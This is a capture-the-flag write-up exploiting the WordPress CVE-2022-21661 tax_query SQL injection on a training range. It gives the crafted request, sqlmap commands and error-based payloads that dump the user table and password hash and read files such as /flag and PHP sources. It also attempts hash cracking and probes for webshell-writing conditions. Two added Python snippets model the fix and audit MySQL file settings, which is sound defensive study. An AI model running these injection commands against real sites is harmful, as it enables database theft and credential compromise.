CVE-2022-21661 on 春秋云境 (Chunqiu Cloud Range): sqlmap + JSON in one go

ops, 2024/10/30 12:33:33

URLs:

https://yunjing.ichunqiu.com/
https://yunjing.ichunqiu.com/cve/detail/1026?pay=2

sqlmap launch parameters:

set cmdpath2024=c:\Python310\python
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23)  " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap {1.6.2.4#dev}, supports Python 3.10
# http://127.0.0.1:8080/ is the HTTP proxy started by Burp Suite 2022, convenient for watching the traffic.

Contents of ./rr2024.txt:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze8beum9sog31ctu6to.cloudeci1.ichunqiu.com
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close

action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}

# The following command lists the tables of the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23)  " --suffix="#" --threads=4 -D cms --tables --proxy=http://127.0.0.1:8080
# The following command lists the columns of the wp_users table in the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users --columns --proxy=http://127.0.0.1:8080
# The following command dumps selected columns (user_login,user_nicename,user_pass) of the wp_users table in the cms database
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users -C "user_login,user_nicename,user_pass" --dump --proxy=http://127.0.0.1:8080
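The injection point in this lab is the `terms` list of a `tax_query` whose `field` is `term_taxonomy_id`: WordPress before 5.8.3 skipped the integer cast for that field, so the raw strings were joined straight into an `IN (...)` list. The following is an added example, not code from the write-up or from WordPress. It models that term handling from the defender's side (a simplified model of the upstream behaviour and fix, not the exact WordPress code) and adds a small detector for the `admin-ajax.php` request shape shown above. It assumes, as the lab does, an `action=test` handler that feeds the `data` JSON into `WP_Query`; the sample bodies are constructed for the example.

```python
"""
Added example (not from the write-up, not WordPress code): a defender's model
of the CVE-2022-21661 term handling plus a detector for the request shape.

Assumption (simplified model of WP_Tax_Query): terms were cast to integers for
every 'field' except 'term_taxonomy_id'; for that field the raw strings went
into "... term_taxonomy_id IN (<terms>)". The hardened variant casts first.
"""
import json
import re
from urllib.parse import parse_qs

INT_PREFIX = re.compile(r"\s*[-+]?\d+")   # the leading digits PHP intval() keeps
PLAIN_INT = re.compile(r"[-+]?\d+")       # what a legitimate term id looks like
SQL_TOKENS = re.compile(
    r"(?i)\b(extractvalue|updatexml|load_file|select|union|sleep|benchmark)\b|[()'\"#]"
)


def vulnerable_in_clause(terms):
    """Before the fix: raw terms are joined straight into the IN list."""
    return "term_taxonomy_id IN (" + ",".join(str(t) for t in terms) + ")"


def hardened_in_clause(terms):
    """After the fix: each term goes through an intval()-style cast, so a term
    such as '12)  AND EXTRACTVALUE(...)#' collapses to 12 and no SQL syntax
    survives. Strings without leading digits become 0, as in PHP."""
    cleaned = []
    for t in terms:
        m = INT_PREFIX.match(str(t))
        cleaned.append(int(m.group()) if m else 0)
    return "term_taxonomy_id IN (" + ",".join(str(c) for c in cleaned) + ")"


def check_admin_ajax_body(body):
    """Inspect a form-encoded admin-ajax.php body and return a list of findings;
    an empty list means every tax_query term is a plain integer id. Accepts
    tax_query as a JSON object ({"0": {...}}) or as a list of clauses."""
    findings = []
    for raw in parse_qs(body, keep_blank_values=True).get("data", []):
        try:
            data = json.loads(raw)
        except ValueError:
            findings.append("data parameter is not valid JSON")
            continue
        tax_query = data.get("tax_query") if isinstance(data, dict) else None
        clauses = tax_query.values() if isinstance(tax_query, dict) else (tax_query or [])
        for clause in clauses:
            if not isinstance(clause, dict):
                continue
            terms = clause.get("terms", [])
            if not isinstance(terms, list):
                terms = [terms]
            for term in terms:
                s = str(term)
                if PLAIN_INT.fullmatch(s):
                    continue
                reason = "contains SQL-looking tokens" if SQL_TOKENS.search(s) else "is not an integer id"
                findings.append(f"field={clause.get('field')!r} term {s[:40]!r} {reason}")
    return findings


# Constructed samples: a legitimate request and the error-based payload shape
# sqlmap produced in the write-up (prefix "2)  " + payload + suffix "#").
BENIGN_BODY = 'action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1"]}}}'
INJECTED_BODY = (
    'action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id",'
    '"terms":["12)  AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,'
    '(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}'
)

if __name__ == "__main__":
    print(vulnerable_in_clause(["12)  AND 1=1#"]))
    print(hardened_in_clause(["12)  AND 1=1#"]))
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(check_admin_ajax_body(body) or ["clean"])
```

`check_admin_ajax_body` is meant to run over request bodies captured by a WAF or access log; the `term_taxonomy_id` field is the interesting one because a plain integer id is the only legitimate value there, so anything else is worth an alert regardless of whether it matches a known SQL token.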

back-end DBMS: MySQL >= 5.0.0
current database: 'cms'
[23:20:12] [INFO] retrieved: 'root@localhost'
current user is DBA: True 
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

Database: cms
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

Database: cms
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+

Database: cms
Table: wp_users
[1 entry]
+-----------------+-----------------+------------------------------------+
| user_login      | user_nicename   | user_pass                          |
+-----------------+-----------------+------------------------------------+
| adminadminadmin | adminadminadmin | $P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0 |
+-----------------+-----------------+------------------------------------+

john cracking failed:

echo 'adminadminadmin:$P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0'>./hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass ./hashes.txt

get flag:

# The following command gets the flag
%cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  --file-read="/flag" --proxy=http://127.0.0.1:8080

Run output:

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["12)  AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
[19:52:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:52:58] [INFO] fingerprinting the back-end DBMS operating system
[19:53:01] [INFO] the back-end DBMS operating system is Linux
[19:53:01] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[19:53:01] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2ze420okq7lq6jfkcesm.cloudeci1.ichunqiu.com\files\_flag
flag{d77546af-4520-4cf4-a200-94a365ce05be}

Probing the preconditions for writing a webshell:

 %cmdpath2024%  sqlmap.py -vvv -r  ./rr2024.txt --dbms=mysql --technique=E  --prefix="2) " --suffix="#" --threads=6  --sql-query "SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir)"  --proxy=http://127.0.0.1:8080

Output:

SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir): '2024-10-29 12:16:47~5.7.39-0ubuntu0.18.04.2~~/usr/lib/mysql/plugin/'
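The probe result above carries three settings a defender should read the other way round: `secure_file_priv` came back as the empty string (the `~~` between the version and the plugin directory), which is what allowed `LOAD_FILE()` to read `/flag`, `/etc/hosts` and the PHP sources later in the write-up. The following is an added audit helper, not part of the write-up or of sqlmap; it parses that `~`-joined string and rates the configuration. One caveat it handles: `CONCAT()` returns NULL when any argument is NULL, so a NULL result for the whole probe usually means `secure_file_priv` is NULL (file I/O disabled), not that the query failed. The sample string is the one printed above.

```python
"""
Added example (not from the write-up): parse the '~'-joined probe result
CONCAT(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir)
and rate the MySQL file-I/O exposure from the defender's side.
"""
import re

SEP = "~"  # the 0x7e separator used in the probe query


def parse_probe(result):
    """Split the probe result into its four fields. A None result is treated as
    'CONCAT() returned NULL', which almost always means @@secure_file_priv is
    NULL, because CONCAT() yields NULL if any argument is NULL."""
    if result is None:
        return {"now": None, "version": None, "secure_file_priv": None, "plugin_dir": None}
    parts = result.split(SEP, 3)
    if len(parts) != 4:
        raise ValueError(f"expected 4 '~'-separated fields, got {len(parts)}")
    now, version, sfp, plugin_dir = parts
    return {"now": now, "version": version, "secure_file_priv": sfp, "plugin_dir": plugin_dir}


def audit_probe(result):
    """Return (findings, recommended_my_cnf). findings is a list of short strings
    tagged HIGH / MEDIUM / INFO / OK."""
    info = parse_probe(result)
    findings = []
    sfp = info["secure_file_priv"]
    if sfp is None:
        findings.append("OK: secure_file_priv is NULL, LOAD_FILE()/SELECT INTO OUTFILE are disabled")
    elif sfp == "":
        findings.append("HIGH: secure_file_priv is empty, LOAD_FILE()/INTO OUTFILE can reach any "
                        "path the mysqld process can read or write")
    else:
        findings.append(f"INFO: secure_file_priv restricts file I/O to {sfp!r}; verify the web "
                        "root is not inside it")
    if sfp == "" and info["plugin_dir"]:
        findings.append(f"MEDIUM: plugin_dir {info['plugin_dir']!r} is reachable by file writes; "
                        "make sure it is not writable by the mysql user and that the application "
                        "account does not hold the FILE privilege")
    version = info["version"] or ""
    m = re.match(r"(\d+)\.(\d+)", version)
    if m and (int(m.group(1)), int(m.group(2))) < (8, 0):
        findings.append(f"INFO: MySQL {version} is a 5.x release; 5.7 reached end of life in "
                        "October 2023")
    # Recommended hardening: disable server-side file import/export entirely.
    my_cnf = "[mysqld]\nsecure_file_priv=NULL\n"
    return findings, my_cnf


# The probe result printed in the write-up.
LAB_PROBE = "2024-10-29 12:16:47~5.7.39-0ubuntu0.18.04.2~~/usr/lib/mysql/plugin/"

if __name__ == "__main__":
    for line in audit_probe(LAB_PROBE)[0]:
        print(line)
    print(audit_probe(LAB_PROBE)[1])
```

Setting `secure_file_priv` to a dedicated directory instead of NULL is acceptable when the application genuinely needs `LOAD DATA` or `INTO OUTFILE`; the point is that an empty value removes every path restriction, and the lab's database user was additionally `root@localhost` with DBA rights, so nothing else stood between the injection and the filesystem.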

Reading the /etc/hosts file (the web/database host separation is fake):

# eci-managed hosts file.
127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
fe00::0	ip6-mcastprefix
fe00::1	ip6-allnodes
fe00::2	ip6-allrouters
10.9.118.207	engine-2

Reading /etc/my.cnf: the file does not exist.

Reading the /etc/resolv.conf file:

nameserver 100.100.2.136
nameserver 100.100.2.138

/var/www/html/wp-admin/profile.php   283 bytes
/var/www/html/.htaccess   261 bytes
/var/www/html/index.php   26 bytes
/var/www/html/wp-admin/admin-functions.php   406 bytes
/var/www/html/wp-admin/admin-ajax.php   4.83 KB (4,948 bytes)

/var/www/html/wp-admin/admin-ajax.php

[22:28:48] [DEBUG] performed 472 queries in 1455.96 seconds
do you want confirmation that the remote file '/var/www/html/wp-admin/admin-ajax.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:28:48] [DEBUG] used the default behavior, running in batch mode
[22:28:48] [DEBUG] checking the length of the remote file '/var/www/html/wp-admin/admin-ajax.php'
[22:28:48] [PAYLOAD] 2)  AND EXTRACTVALUE(9473,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f77702d61646d696e2f61646d696e2d616a61782e706870)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:28:50] [INFO] retrieved: '4948'
[22:28:50] [DEBUG] performed 1 query in 2.26 seconds
[22:28:50] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php' and the remote file '/var/www/html/wp-admin/admin-ajax.php' have the same size (4948 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php (same file)

Probing /var/www/html/.htaccess

[22:31:50] [DEBUG] performed 25 queries in 71.15 seconds
do you want confirmation that the remote file '/var/www/html/.htaccess' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:31:50] [DEBUG] used the default behavior, running in batch mode
[22:31:50] [DEBUG] checking the length of the remote file '/var/www/html/.htaccess'
[22:31:50] [PAYLOAD] 2)  AND EXTRACTVALUE(7365,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f2e6874616363657373)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:31:52] [INFO] retrieved: '261'
[22:31:52] [DEBUG] performed 1 query in 2.24 seconds
[22:31:52] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess' and the remote file '/var/www/html/.htaccess' have the same size (261 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess (same file)

Contents of /var/www/html/.htaccess:

# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
# END WordPress


http://www.ppmy.cn/ops/129583.html
